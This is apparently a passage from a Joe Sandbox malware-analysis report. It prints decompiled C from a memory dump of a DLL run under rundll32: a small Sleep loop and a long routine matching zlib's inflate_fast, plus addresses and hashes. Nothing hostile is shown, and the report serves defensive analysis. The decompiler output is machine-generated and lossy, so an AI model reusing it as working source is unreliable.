                                                                                                                                                                                                                • Opcode Fuzzy Hash: 30269b090895166bbe13c55bfc90a8f6ec17342fa027b451788cb05830dff57e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9D51C171E04708DFEF28CA68D8987EE77B4AB04304F54605AD7C5A7E52E2347A80DBC0
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                C-Code - Quality: 91%
                                                                                                                                                                                                                			E1000ABCF(void* __ecx, intOrPtr _a4, signed int _a8) {
                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                				intOrPtr _v12;
                                                                                                                                                                                                                				signed int _t26;
                                                                                                                                                                                                                				signed int _t28;
                                                                                                                                                                                                                				signed int* _t36;
                                                                                                                                                                                                                				signed int* _t39;
                                                                                                                                                                                                                
                                                                                                                                                                                                                				_push(__ecx);
                                                                                                                                                                                                                				_push(__ecx);
                                                                                                                                                                                                                				_t36 = _a8;
                                                                                                                                                                                                                				_t28 = _t36[1];
                                                                                                                                                                                                                				if(_t28 != 0) {
                                                                                                                                                                                                                					_t39 = _t36[2];
                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                						_a8 = _a8 & 0x00000000;
                                                                                                                                                                                                                						if(_t39[2] > 0) {
                                                                                                                                                                                                                							_t31 = _t39[3];
                                                                                                                                                                                                                							_t22 = _a4 + 0x24;
                                                                                                                                                                                                                							_v12 = _a4 + 0x24;
                                                                                                                                                                                                                							_v8 = _t39[3];
                                                                                                                                                                                                                							while(E1000B9C1(_t22,  *_t31) != 0) {
                                                                                                                                                                                                                								_t26 = _a8 + 1;
                                                                                                                                                                                                                								_t31 = _v8 + 4;
                                                                                                                                                                                                                								_a8 = _t26;
                                                                                                                                                                                                                								_t22 = _v12;
                                                                                                                                                                                                                								_v8 = _v8 + 4;
                                                                                                                                                                                                                								if(_t26 < _t39[2]) {
                                                                                                                                                                                                                									continue;
                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                								}
                                                                                                                                                                                                                								goto L8;
                                                                                                                                                                                                                							}
                                                                                                                                                                                                                							 *_t36 =  *_t36 |  *_t39;
                                                                                                                                                                                                                						}
                                                                                                                                                                                                                						L8:
                                                                                                                                                                                                                						_t39 =  &(_t39[4]);
                                                                                                                                                                                                                						_t28 = _t28 - 1;
                                                                                                                                                                                                                					} while (_t28 != 0);
                                                                                                                                                                                                                				}
                                                                                                                                                                                                                				Sleep(0xa);
                                                                                                                                                                                                                				return 1;
                                                                                                                                                                                                                			}









                                                                                                                                                                                                                0x1000abd2
                                                                                                                                                                                                                0x1000abd3
                                                                                                                                                                                                                0x1000abd6
                                                                                                                                                                                                                0x1000abd9
                                                                                                                                                                                                                0x1000abde
                                                                                                                                                                                                                0x1000abe1
                                                                                                                                                                                                                0x1000abe4
                                                                                                                                                                                                                0x1000abe4
                                                                                                                                                                                                                0x1000abec
                                                                                                                                                                                                                0x1000abf1
                                                                                                                                                                                                                0x1000abf4
                                                                                                                                                                                                                0x1000abf7
                                                                                                                                                                                                                0x1000abfa
                                                                                                                                                                                                                0x1000abfd
                                                                                                                                                                                                                0x1000ac10
                                                                                                                                                                                                                0x1000ac11
                                                                                                                                                                                                                0x1000ac14
                                                                                                                                                                                                                0x1000ac1a
                                                                                                                                                                                                                0x1000ac1d
                                                                                                                                                                                                                0x1000ac20
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000ac22
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000ac20
                                                                                                                                                                                                                0x1000ac26
                                                                                                                                                                                                                0x1000ac26
                                                                                                                                                                                                                0x1000ac28
                                                                                                                                                                                                                0x1000ac28
                                                                                                                                                                                                                0x1000ac2b
                                                                                                                                                                                                                0x1000ac2b
                                                                                                                                                                                                                0x1000ac30
                                                                                                                                                                                                                0x1000ac38
                                                                                                                                                                                                                0x1000ac44

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • Sleep.KERNELBASE(0000000A), ref: 1000AC38
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000D.00000002.5727312172.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727281860.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727452661.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727497896.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727528413.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Sleep
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3472027048-0
                                                                                                                                                                                                                • Opcode ID: 0c40166de47bb0dd70a3ea95c49e5e074fb2617b4ba7f5ff59f65a45c3ad187d
                                                                                                                                                                                                                • Instruction ID: 66f6f85122bc0b5e4dd60674b04f8dfa5216e6efcab965929a2ae1e5fa2a9f07
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0c40166de47bb0dd70a3ea95c49e5e074fb2617b4ba7f5ff59f65a45c3ad187d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C2115B31A00305AFEB04CFA9C984B99B7E8EF452A4F118569E85AEB305C374E980CB40
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                C-Code - Quality: 81%
                                                                                                                                                                                                                			E1001799F(void* __edi) {
                                                                                                                                                                                                                				signed int _t164;
                                                                                                                                                                                                                				unsigned int _t172;
                                                                                                                                                                                                                				unsigned int _t173;
                                                                                                                                                                                                                				signed int _t174;
                                                                                                                                                                                                                				signed int _t176;
                                                                                                                                                                                                                				signed int _t178;
                                                                                                                                                                                                                				signed int _t179;
                                                                                                                                                                                                                				signed int _t182;
                                                                                                                                                                                                                				signed int _t184;
                                                                                                                                                                                                                				unsigned int _t185;
                                                                                                                                                                                                                				int _t186;
                                                                                                                                                                                                                				int _t194;
                                                                                                                                                                                                                				signed char _t200;
                                                                                                                                                                                                                				signed int _t207;
                                                                                                                                                                                                                				signed int _t208;
                                                                                                                                                                                                                				signed int _t209;
                                                                                                                                                                                                                				int _t210;
                                                                                                                                                                                                                				int _t222;
                                                                                                                                                                                                                				signed int _t227;
                                                                                                                                                                                                                				signed int _t235;
                                                                                                                                                                                                                				signed int _t251;
                                                                                                                                                                                                                				signed char _t252;
                                                                                                                                                                                                                				unsigned int _t253;
                                                                                                                                                                                                                				signed char _t254;
                                                                                                                                                                                                                				signed int* _t255;
                                                                                                                                                                                                                				signed int _t258;
                                                                                                                                                                                                                				signed int _t259;
                                                                                                                                                                                                                				signed int _t260;
                                                                                                                                                                                                                				signed int _t266;
                                                                                                                                                                                                                				intOrPtr _t271;
                                                                                                                                                                                                                				signed char _t278;
                                                                                                                                                                                                                				signed int _t279;
                                                                                                                                                                                                                				char* _t280;
                                                                                                                                                                                                                				signed int _t282;
                                                                                                                                                                                                                				signed char _t284;
                                                                                                                                                                                                                				signed int _t287;
                                                                                                                                                                                                                				signed int _t291;
                                                                                                                                                                                                                				int _t292;
                                                                                                                                                                                                                				int _t293;
                                                                                                                                                                                                                				int _t296;
                                                                                                                                                                                                                				int _t298;
                                                                                                                                                                                                                				int _t302;
                                                                                                                                                                                                                				signed int _t305;
                                                                                                                                                                                                                				signed char _t311;
                                                                                                                                                                                                                				signed char _t312;
                                                                                                                                                                                                                				signed char _t315;
                                                                                                                                                                                                                				signed char _t316;
                                                                                                                                                                                                                				signed int _t318;
                                                                                                                                                                                                                				int _t319;
                                                                                                                                                                                                                				int _t320;
                                                                                                                                                                                                                				signed char _t322;
                                                                                                                                                                                                                				int _t324;
                                                                                                                                                                                                                				int _t326;
                                                                                                                                                                                                                				int _t330;
                                                                                                                                                                                                                				signed int _t333;
                                                                                                                                                                                                                				signed char _t336;
                                                                                                                                                                                                                				signed char _t337;
                                                                                                                                                                                                                				signed char _t339;
                                                                                                                                                                                                                				int _t341;
                                                                                                                                                                                                                				signed int _t347;
                                                                                                                                                                                                                				int _t349;
                                                                                                                                                                                                                				intOrPtr _t350;
                                                                                                                                                                                                                				intOrPtr _t351;
                                                                                                                                                                                                                				unsigned int _t356;
                                                                                                                                                                                                                				unsigned int _t361;
                                                                                                                                                                                                                				signed int _t364;
                                                                                                                                                                                                                				signed int _t365;
                                                                                                                                                                                                                				intOrPtr _t367;
                                                                                                                                                                                                                				void* _t368;
                                                                                                                                                                                                                				intOrPtr* _t380;
                                                                                                                                                                                                                				void* _t381;
                                                                                                                                                                                                                				intOrPtr* _t389;
                                                                                                                                                                                                                				void* _t390;
                                                                                                                                                                                                                				signed int _t395;
                                                                                                                                                                                                                				void* _t396;
                                                                                                                                                                                                                				signed int _t397;
                                                                                                                                                                                                                				void* _t403;
                                                                                                                                                                                                                				void* _t405;
                                                                                                                                                                                                                				intOrPtr* _t412;
                                                                                                                                                                                                                				void* _t413;
                                                                                                                                                                                                                				signed int _t414;
                                                                                                                                                                                                                				void* _t416;
                                                                                                                                                                                                                				intOrPtr* _t423;
                                                                                                                                                                                                                				void* _t424;
                                                                                                                                                                                                                				unsigned int _t430;
                                                                                                                                                                                                                				signed int _t431;
                                                                                                                                                                                                                				void* _t434;
                                                                                                                                                                                                                				signed int* _t435;
                                                                                                                                                                                                                				void* _t439;
                                                                                                                                                                                                                
                                                                                                                                                                                                                				 *((intOrPtr*)(__edi + 0x56))();
                                                                                                                                                                                                                				asm("pushfd");
                                                                                                                                                                                                                				_t435 = _t434 - 0x40;
                                                                                                                                                                                                                				asm("cld");
                                                                                                                                                                                                                				_t395 = _t435[0x16];
                                                                                                                                                                                                                				_t367 =  *((intOrPtr*)(_t395 + 0x1c));
                                                                                                                                                                                                                				_t164 =  *_t395;
                                                                                                                                                                                                                				_t435[0xb] = _t164;
                                                                                                                                                                                                                				_t435[5] =  *((intOrPtr*)(_t395 + 4)) + _t164 - 0xb;
                                                                                                                                                                                                                				_t271 =  *((intOrPtr*)(_t395 + 0x10));
                                                                                                                                                                                                                				_t251 =  *(_t395 + 0xc);
                                                                                                                                                                                                                				_t435[0xf] = _t251;
                                                                                                                                                                                                                				_t435[0xa] =  ~(_t435[0x17] - _t271) + _t251;
                                                                                                                                                                                                                				_t435[4] = _t271 - 0x101 + _t251;
                                                                                                                                                                                                                				_t435[2] =  *(_t367 + 0x4c);
                                                                                                                                                                                                                				_t435[3] =  *(_t367 + 0x50);
                                                                                                                                                                                                                				 *_t435 = (1 <<  *(_t367 + 0x54)) - 1;
                                                                                                                                                                                                                				_t435[1] = (1 <<  *(_t367 + 0x58)) - 1;
                                                                                                                                                                                                                				_t172 =  *(_t367 + 0x28);
                                                                                                                                                                                                                				_t347 =  *(_t367 + 0x34);
                                                                                                                                                                                                                				_t435[0xd] = _t172;
                                                                                                                                                                                                                				_t435[0xc] =  *(_t367 + 0x30);
                                                                                                                                                                                                                				_t435[0xe] = _t347;
                                                                                                                                                                                                                				_t430 =  *(_t367 + 0x38);
                                                                                                                                                                                                                				_t252 =  *(_t367 + 0x3c);
                                                                                                                                                                                                                				_t396 = _t435[0xb];
                                                                                                                                                                                                                				_t278 = _t435[5];
                                                                                                                                                                                                                				if(_t278 > _t396) {
                                                                                                                                                                                                                					L2:
                                                                                                                                                                                                                					if((_t396 & 0x00000003) != 0) {
                                                                                                                                                                                                                						_t396 = _t396 + 1;
                                                                                                                                                                                                                						_t278 = _t252;
                                                                                                                                                                                                                						_t252 = _t252 + 8;
                                                                                                                                                                                                                						_t172 = 0 << _t278;
                                                                                                                                                                                                                						_t430 = _t430 | _t172;
                                                                                                                                                                                                                						goto L2;
                                                                                                                                                                                                                					}
                                                                                                                                                                                                                					goto L4;
                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                					_t341 = _t278 + 0xb - _t396;
                                                                                                                                                                                                                					_t172 = memset(_t396 + _t341 + _t341, 0, memcpy( &(_t435[7]), _t396, _t341) << 0);
                                                                                                                                                                                                                					_t435 =  &(_t435[6]);
                                                                                                                                                                                                                					_t278 = 0;
                                                                                                                                                                                                                					_t396 =  &(_t435[7]);
                                                                                                                                                                                                                					_t435[5] = _t396;
                                                                                                                                                                                                                					L4:
                                                                                                                                                                                                                					_t368 = _t435[0xf];
                                                                                                                                                                                                                					while(1) {
                                                                                                                                                                                                                						_t439 =  *0x1001f040 - 2;
                                                                                                                                                                                                                						if(_t439 == 0) {
                                                                                                                                                                                                                							break;
                                                                                                                                                                                                                						}
                                                                                                                                                                                                                						if(_t439 > 0) {
                                                                                                                                                                                                                							do {
                                                                                                                                                                                                                								if(_t252 <= 0xf) {
                                                                                                                                                                                                                									asm("lodsw");
                                                                                                                                                                                                                									_t322 = _t252;
                                                                                                                                                                                                                									_t252 = _t252 + 0x10;
                                                                                                                                                                                                                									_t430 = _t431 | 0 << _t322;
                                                                                                                                                                                                                								}
                                                                                                                                                                                                                								_t173 =  *(_t435[2] + ( *_t435 & _t430) * 4);
                                                                                                                                                                                                                								while(1) {
                                                                                                                                                                                                                									_t253 = _t252 - _t173;
                                                                                                                                                                                                                									_t431 = _t430 >> _t173;
                                                                                                                                                                                                                									if(_t173 == 0) {
                                                                                                                                                                                                                										asm("stosb");
                                                                                                                                                                                                                										goto L22;
                                                                                                                                                                                                                									}
                                                                                                                                                                                                                									_t356 = _t173 >> 0x10;
                                                                                                                                                                                                                									_t311 = _t173;
                                                                                                                                                                                                                									if((_t173 & 0x00000010) == 0) {
                                                                                                                                                                                                                										if((_t173 & 0x00000040) != 0) {
                                                                                                                                                                                                                											L97:
                                                                                                                                                                                                                											if((_t173 & 0x00000020) == 0) {
                                                                                                                                                                                                                												_t280 = "invalid literal/length code";
                                                                                                                                                                                                                												_t350 = 0x1a;
                                                                                                                                                                                                                											} else {
                                                                                                                                                                                                                												_t280 = 0;
                                                                                                                                                                                                                												_t350 = 0xb;
                                                                                                                                                                                                                											}
                                                                                                                                                                                                                											L101:
                                                                                                                                                                                                                											_t174 = _t435[0x16];
                                                                                                                                                                                                                											if(_t280 != 0) {
                                                                                                                                                                                                                												 *(_t174 + 0x18) = _t280;
                                                                                                                                                                                                                											}
                                                                                                                                                                                                                											 *((intOrPtr*)( *((intOrPtr*)(_t174 + 0x1c)))) = _t350;
                                                                                                                                                                                                                											goto L104;
                                                                                                                                                                                                                										}
                                                                                                                                                                                                                										_t173 =  *(_t435[2] + (((0x00000001 << _t311) - 0x00000001 & _t431) + _t356) * 4);
                                                                                                                                                                                                                										continue;
                                                                                                                                                                                                                									}
                                                                                                                                                                                                                									_t312 = _t311 & 0x0000000f;
                                                                                                                                                                                                                									if(_t312 != 0) {
                                                                                                                                                                                                                										if(_t253 < _t312) {
                                                                                                                                                                                                                											asm("lodsw");
                                                                                                                                                                                                                											_t339 = _t253;
                                                                                                                                                                                                                											_t253 = _t253 + 0x10;
                                                                                                                                                                                                                											_t431 = _t431 | 0 << _t339;
                                                                                                                                                                                                                											_t312 = _t339;
                                                                                                                                                                                                                										}
                                                                                                                                                                                                                										_t253 = _t253 - _t312;
                                                                                                                                                                                                                										_t235 = (0x00000001 << _t312) - 0x00000001 & _t431;
                                                                                                                                                                                                                										_t431 = _t431 >> _t312;
                                                                                                                                                                                                                										_t356 = _t356 + _t235;
                                                                                                                                                                                                                									}
                                                                                                                                                                                                                									_t435[6] = _t356;
                                                                                                                                                                                                                									if(_t253 <= 0xf) {
                                                                                                                                                                                                                										asm("lodsw");
                                                                                                                                                                                                                										_t337 = _t253;
                                                                                                                                                                                                                										_t253 = _t253 + 0x10;
                                                                                                                                                                                                                										_t431 = _t431 | 0 << _t337;
                                                                                                                                                                                                                									}
                                                                                                                                                                                                                									_t200 =  *(_t435[3] + (_t435[1] & _t431) * 4);
                                                                                                                                                                                                                									while(1) {
                                                                                                                                                                                                                										_t361 = _t200 >> 0x10;
                                                                                                                                                                                                                										_t253 = _t253 - _t200;
                                                                                                                                                                                                                										_t431 = _t431 >> _t200;
                                                                                                                                                                                                                										_t315 = _t200;
                                                                                                                                                                                                                										if((_t200 & 0x00000010) != 0) {
                                                                                                                                                                                                                											break;
                                                                                                                                                                                                                										}
                                                                                                                                                                                                                										if((_t200 & 0x00000040) != 0) {
                                                                                                                                                                                                                											L96:
                                                                                                                                                                                                                											_t280 = "invalid distance code";
                                                                                                                                                                                                                											_t350 = 0x1a;
                                                                                                                                                                                                                											goto L101;
                                                                                                                                                                                                                										}
                                                                                                                                                                                                                										_t200 =  *(_t435[3] + (((0x00000001 << _t315) - 0x00000001 & _t431) + _t361) * 4);
                                                                                                                                                                                                                									}
                                                                                                                                                                                                                									_t316 = _t315 & 0x0000000f;
                                                                                                                                                                                                                									if(_t316 == 0) {
                                                                                                                                                                                                                										if(_t361 != 1 || _t435[0xa] == _t368) {
                                                                                                                                                                                                                											L38:
                                                                                                                                                                                                                											_t435[0xb] = _t396;
                                                                                                                                                                                                                											_t207 = _t368 - _t435[0xa];
                                                                                                                                                                                                                											if(_t207 < _t361) {
                                                                                                                                                                                                                												_t208 = _t435[0xd];
                                                                                                                                                                                                                												_t318 =  ~_t207;
                                                                                                                                                                                                                												_t414 = _t435[0xe];
                                                                                                                                                                                                                												if(_t208 < _t361) {
                                                                                                                                                                                                                													L100:
                                                                                                                                                                                                                													_t396 = _t435[0xb];
                                                                                                                                                                                                                													_t280 = "invalid distance too far back";
                                                                                                                                                                                                                													_t350 = 0x1a;
                                                                                                                                                                                                                													goto L101;
                                                                                                                                                                                                                												}
                                                                                                                                                                                                                												_t319 = _t318 + _t361;
                                                                                                                                                                                                                												if(_t435[0xc] != 0) {
                                                                                                                                                                                                                													_t209 = _t435[0xc];
                                                                                                                                                                                                                													if(_t319 <= _t209) {
                                                                                                                                                                                                                														_t416 = _t414 + _t209 - _t319;
                                                                                                                                                                                                                														_t210 = _t435[6];
                                                                                                                                                                                                                														if(_t210 > _t319) {
                                                                                                                                                                                                                															_t210 = memcpy(_t368, _t416, _t319);
                                                                                                                                                                                                                															_t435 =  &(_t435[3]);
                                                                                                                                                                                                                															_t368 = _t416 + _t319 + _t319;
                                                                                                                                                                                                                															_t416 = _t368 - _t361;
                                                                                                                                                                                                                														}
                                                                                                                                                                                                                													} else {
                                                                                                                                                                                                                														_t416 = _t414 + _t435[0xd] + _t209 - _t319;
                                                                                                                                                                                                                														_t324 = _t319 - _t209;
                                                                                                                                                                                                                														_t210 = _t435[6];
                                                                                                                                                                                                                														if(_t210 > _t324) {
                                                                                                                                                                                                                															_t210 = memcpy(_t368, _t416, _t324);
                                                                                                                                                                                                                															_t435 =  &(_t435[3]);
                                                                                                                                                                                                                															_t368 = _t416 + _t324 + _t324;
                                                                                                                                                                                                                															_t416 = _t435[0xe];
                                                                                                                                                                                                                															_t326 = _t435[0xc];
                                                                                                                                                                                                                															if(_t210 > _t326) {
                                                                                                                                                                                                                																_t210 = memcpy(_t368, _t416, _t326);
                                                                                                                                                                                                                																_t435 =  &(_t435[3]);
                                                                                                                                                                                                                																_t368 = _t416 + _t326 + _t326;
                                                                                                                                                                                                                																_t416 = _t368 - _t361;
                                                                                                                                                                                                                															}
                                                                                                                                                                                                                														}
                                                                                                                                                                                                                													}
                                                                                                                                                                                                                												} else {
                                                                                                                                                                                                                													_t416 = _t414 + _t208 - _t319;
                                                                                                                                                                                                                													_t210 = _t435[6];
                                                                                                                                                                                                                													if(_t210 > _t319) {
                                                                                                                                                                                                                														_t210 = memcpy(_t368, _t416, _t319);
                                                                                                                                                                                                                														_t435 =  &(_t435[3]);
                                                                                                                                                                                                                														_t368 = _t416 + _t319 + _t319;
                                                                                                                                                                                                                														_t416 = _t368 - _t361;
                                                                                                                                                                                                                													}
                                                                                                                                                                                                                												}
                                                                                                                                                                                                                												_t320 = _t210;
                                                                                                                                                                                                                												memcpy(_t368, _t416, _t320);
                                                                                                                                                                                                                												_t435 =  &(_t435[3]);
                                                                                                                                                                                                                												_t368 = _t416 + _t320 + _t320;
                                                                                                                                                                                                                												_t396 = _t435[0xb];
                                                                                                                                                                                                                												goto L22;
                                                                                                                                                                                                                											}
                                                                                                                                                                                                                											_t423 = _t368 - _t361;
                                                                                                                                                                                                                											_t330 = _t435[6] - 3;
                                                                                                                                                                                                                											 *_t368 =  *_t423;
                                                                                                                                                                                                                											_t424 = _t423 + 3;
                                                                                                                                                                                                                											 *((char*)(_t368 + 1)) =  *((intOrPtr*)(_t423 + 1));
                                                                                                                                                                                                                											 *((char*)(_t368 + 2)) =  *((intOrPtr*)(_t423 + 2));
                                                                                                                                                                                                                											memcpy(_t368 + 3, _t424, _t330);
                                                                                                                                                                                                                											_t435 =  &(_t435[3]);
                                                                                                                                                                                                                											_t368 = _t424 + _t330 + _t330;
                                                                                                                                                                                                                											_t396 = _t435[0xb];
                                                                                                                                                                                                                										} else {
                                                                                                                                                                                                                											_t389 = _t368 - 1;
                                                                                                                                                                                                                											_t222 =  *_t389;
                                                                                                                                                                                                                											_t333 = _t435[6] - 3;
                                                                                                                                                                                                                											 *(_t389 + 1) = _t222;
                                                                                                                                                                                                                											 *(_t389 + 2) = _t222;
                                                                                                                                                                                                                											 *(_t389 + 3) = _t222;
                                                                                                                                                                                                                											_t390 = _t389 + 4;
                                                                                                                                                                                                                											memset(_t390, _t222, _t333 << 0);
                                                                                                                                                                                                                											_t435 =  &(_t435[3]);
                                                                                                                                                                                                                											_t368 = _t390 + _t333;
                                                                                                                                                                                                                										}
                                                                                                                                                                                                                										goto L22;
                                                                                                                                                                                                                									}
                                                                                                                                                                                                                									if(_t253 < _t316) {
                                                                                                                                                                                                                										asm("lodsw");
                                                                                                                                                                                                                										_t336 = _t253;
                                                                                                                                                                                                                										_t253 = _t253 + 0x10;
                                                                                                                                                                                                                										_t431 = _t431 | 0 << _t336;
                                                                                                                                                                                                                										_t316 = _t336;
                                                                                                                                                                                                                									}
                                                                                                                                                                                                                									_t253 = _t253 - _t316;
                                                                                                                                                                                                                									_t227 = (0x00000001 << _t316) - 0x00000001 & _t431;
                                                                                                                                                                                                                									_t431 = _t431 >> _t316;
                                                                                                                                                                                                                									_t361 = _t361 + _t227;
                                                                                                                                                                                                                									goto L38;
                                                                                                                                                                                                                								}
                                                                                                                                                                                                                								L22:
                                                                                                                                                                                                                							} while (_t435[4] > _t368 && _t435[5] > _t396);
                                                                                                                                                                                                                							L104:
                                                                                                                                                                                                                							if( *0x1001f040 == 2) {
                                                                                                                                                                                                                								_t253 = _t431;
                                                                                                                                                                                                                							}
                                                                                                                                                                                                                							_t176 = _t435[0x16];
                                                                                                                                                                                                                							_t351 =  *((intOrPtr*)(_t176 + 0x1c));
                                                                                                                                                                                                                							_t282 = _t253 >> 3;
                                                                                                                                                                                                                							_t397 = _t396 - _t282;
                                                                                                                                                                                                                							_t254 = _t253 - (_t282 << 3);
                                                                                                                                                                                                                							 *(_t176 + 0xc) = _t368;
                                                                                                                                                                                                                							 *(_t351 + 0x3c) = _t254;
                                                                                                                                                                                                                							_t284 = _t254;
                                                                                                                                                                                                                							_t255 =  &(_t435[7]);
                                                                                                                                                                                                                							if(_t435[5] == _t255) {
                                                                                                                                                                                                                								_t266 =  *_t176;
                                                                                                                                                                                                                								_t435[5] = _t266;
                                                                                                                                                                                                                								_t397 = _t397 - _t255 + _t266;
                                                                                                                                                                                                                								_t435[5] = _t435[5] +  *((intOrPtr*)(_t176 + 4)) - 0xb;
                                                                                                                                                                                                                							}
                                                                                                                                                                                                                							 *_t176 = _t397;
                                                                                                                                                                                                                							_t258 = (1 << _t284) - 1;
                                                                                                                                                                                                                							if( *0x1001f040 == 2) {
                                                                                                                                                                                                                								asm("psrlq mm0, mm1");
                                                                                                                                                                                                                								asm("movd ebp, mm0");
                                                                                                                                                                                                                								asm("emms");
                                                                                                                                                                                                                							}
                                                                                                                                                                                                                							 *(_t351 + 0x38) = _t431 & _t258;
                                                                                                                                                                                                                							_t259 = _t435[5];
                                                                                                                                                                                                                							if(_t259 <= _t397) {
                                                                                                                                                                                                                								 *((intOrPtr*)(_t176 + 4)) =  ~(_t397 - _t259) + 0xb;
                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                								 *((intOrPtr*)(_t176 + 4)) = _t259 - _t397 + 0xb;
                                                                                                                                                                                                                							}
                                                                                                                                                                                                                							_t260 = _t435[4];
                                                                                                                                                                                                                							if(_t260 <= _t368) {
                                                                                                                                                                                                                								 *((intOrPtr*)(_t176 + 0x10)) =  ~(_t368 - _t260) + 0x101;
                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                								 *((intOrPtr*)(_t176 + 0x10)) = _t260 - _t368 + 0x101;
                                                                                                                                                                                                                							}
                                                                                                                                                                                                                							asm("popfd");
                                                                                                                                                                                                                							return _t176;
                                                                                                                                                                                                                						}
                                                                                                                                                                                                                						_push(_t172);
                                                                                                                                                                                                                						_push(_t252);
                                                                                                                                                                                                                						_push(_t278);
                                                                                                                                                                                                                						_push(_t347);
                                                                                                                                                                                                                						asm("pushfd");
                                                                                                                                                                                                                						 *_t435 =  *_t435 ^ 0x00200000;
                                                                                                                                                                                                                						asm("popfd");
                                                                                                                                                                                                                						asm("pushfd");
                                                                                                                                                                                                                						_pop(_t364);
                                                                                                                                                                                                                						_t365 = _t364 ^  *_t435;
                                                                                                                                                                                                                						if(_t365 == 0) {
                                                                                                                                                                                                                							L15:
                                                                                                                                                                                                                							 *0x1001f040 = 3;
                                                                                                                                                                                                                							L16:
                                                                                                                                                                                                                							_pop(_t347);
                                                                                                                                                                                                                							_pop(_t278);
                                                                                                                                                                                                                							_pop(_t252);
                                                                                                                                                                                                                							_pop(_t172);
                                                                                                                                                                                                                							continue;
                                                                                                                                                                                                                						}
                                                                                                                                                                                                                						asm("cpuid");
                                                                                                                                                                                                                						if(_t252 != 0x756e6547 || _t278 != 0x6c65746e || _t365 != 0x49656e69) {
                                                                                                                                                                                                                							goto L15;
                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                							asm("cpuid");
                                                                                                                                                                                                                							if(0xd != 6 || (_t365 & 0x00800000) == 0) {
                                                                                                                                                                                                                								goto L15;
                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                								 *0x1001f040 = 2;
                                                                                                                                                                                                                								goto L16;
                                                                                                                                                                                                                							}
                                                                                                                                                                                                                						}
                                                                                                                                                                                                                					}
                                                                                                                                                                                                                					asm("emms");
                                                                                                                                                                                                                					asm("movd mm0, ebp");
                                                                                                                                                                                                                					_t431 = _t252;
                                                                                                                                                                                                                					asm("movd mm4, dword [esp]");
                                                                                                                                                                                                                					asm("movq mm3, mm4");
                                                                                                                                                                                                                					asm("movd mm5, dword [esp+0x4]");
                                                                                                                                                                                                                					asm("movq mm2, mm5");
                                                                                                                                                                                                                					asm("pxor mm1, mm1");
                                                                                                                                                                                                                					_t253 = _t435[2];
                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                						asm("psrlq mm0, mm1");
                                                                                                                                                                                                                						if(_t431 <= 0x20) {
                                                                                                                                                                                                                							asm("movd mm6, ebp");
                                                                                                                                                                                                                							asm("movd mm7, dword [esi]");
                                                                                                                                                                                                                							_t396 = _t396 + 4;
                                                                                                                                                                                                                							asm("psllq mm7, mm6");
                                                                                                                                                                                                                							_t431 = _t431 + 0x20;
                                                                                                                                                                                                                							asm("por mm0, mm7");
                                                                                                                                                                                                                						}
                                                                                                                                                                                                                						asm("pand mm4, mm0");
                                                                                                                                                                                                                						asm("movd eax, mm4");
                                                                                                                                                                                                                						asm("movq mm4, mm3");
                                                                                                                                                                                                                						_t173 =  *(_t253 + _t172 * 4);
                                                                                                                                                                                                                						while(1) {
                                                                                                                                                                                                                							_t279 = _t173 & 0x000000ff;
                                                                                                                                                                                                                							asm("movd mm1, ecx");
                                                                                                                                                                                                                							_t431 = _t431 - _t279;
                                                                                                                                                                                                                							if(_t173 == 0) {
                                                                                                                                                                                                                								break;
                                                                                                                                                                                                                							}
                                                                                                                                                                                                                							_t349 = _t173 >> 0x10;
                                                                                                                                                                                                                							if((_t173 & 0x00000010) == 0) {
                                                                                                                                                                                                                								if((_t173 & 0x00000040) != 0) {
                                                                                                                                                                                                                									goto L97;
                                                                                                                                                                                                                								}
                                                                                                                                                                                                                								asm("psrlq mm0, mm1");
                                                                                                                                                                                                                								asm("movd ecx, mm0");
                                                                                                                                                                                                                								_t173 =  *(_t253 + ((_t279 &  *(0x1001791c + (_t173 & 0x0000000f) * 4)) + _t349) * 4);
                                                                                                                                                                                                                								continue;
                                                                                                                                                                                                                							}
                                                                                                                                                                                                                							_t178 = _t173 & 0x0000000f;
                                                                                                                                                                                                                							if(_t178 != 0) {
                                                                                                                                                                                                                								asm("psrlq mm0, mm1");
                                                                                                                                                                                                                								asm("movd mm1, eax");
                                                                                                                                                                                                                								asm("movd ecx, mm0");
                                                                                                                                                                                                                								_t431 = _t431 - _t178;
                                                                                                                                                                                                                								_t349 = _t349 + (_t279 &  *(0x1001791c + _t178 * 4));
                                                                                                                                                                                                                							}
                                                                                                                                                                                                                							asm("psrlq mm0, mm1");
                                                                                                                                                                                                                							if(_t431 <= 0x20) {
                                                                                                                                                                                                                								asm("movd mm6, ebp");
                                                                                                                                                                                                                								asm("movd mm7, dword [esi]");
                                                                                                                                                                                                                								_t396 = _t396 + 4;
                                                                                                                                                                                                                								asm("psllq mm7, mm6");
